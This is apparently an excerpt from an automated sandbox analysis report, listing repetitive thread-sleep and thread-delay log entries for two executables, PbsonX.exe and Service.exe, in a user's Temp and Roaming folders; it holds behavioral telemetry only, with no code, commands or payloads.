Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -597344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -597234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -597125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -597016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -596907s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -596782s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -596657s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -596532s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -596422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -596313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -596188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -596063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -595938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -595813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -595703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -595594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -595385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -595065s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -594766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -594655s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -594546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -594391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -594258s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -594016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -593844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -593625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -593507s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -593390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -593281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -593150s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -593047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -592922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -592809s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -592295s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 2896 Thread sleep time: -592139s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3264 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7288 Thread sleep count: 6984 > 30
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -599867s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -599750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -599630s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -599500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -599391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -599266s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7288 Thread sleep count: 2740 > 30
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -599156s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -598971s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -598840s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -598469s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -596094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -595840s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -595733s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -595516s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -595352s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -594976s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -594844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -594657s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -594372s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -594243s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -594114s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -593985s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -593844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -593734s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -593020s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -592813s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -592453s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -592125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -591984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -591855s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -591735s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -591625s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -591500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -591357s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -591250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7256 Thread sleep time: -591140s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7280 Thread sleep count: 8291 > 30
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -599867s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -599749s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -599630s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -599500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7280 Thread sleep count: 1496 > 30
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -599390s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -599280s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -599171s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -598970s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -598839s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -598358s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -598249s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -598140s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -598031s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -597921s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -597807s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -597702s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -597593s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -597374s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -597155s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -596129s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -595984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -595855s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -595749s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -595640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -595530s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -595396s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -595265s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -595145s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -594984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -594844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -594372s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -594242s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -594113s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -593984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -593859s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -593747s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -593019s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -592609s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -592156s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -591984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -591855s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -591734s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -591625s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -591499s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -591357s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7260 Thread sleep time: -591249s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7268 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7268 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7268 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7304 Thread sleep count: 8739 > 30
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7268 Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599654 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599544 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599435 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599327 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598219 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597672 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597344 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597217 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597109 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596931 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596767 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596600 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596483 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596373 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596266 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596047 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595047 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594500 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594391 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599326 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599217 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599108 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598230 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598113 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597992 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597872 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597546 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597436 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597327 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597218 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597108 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596999 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596671 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596453 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596232 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596124 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595906 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595684 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595468 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595244 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594923 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594750 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594623 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594513 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594402 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594117 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593484 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593366 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593248 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593140 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592890 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599766
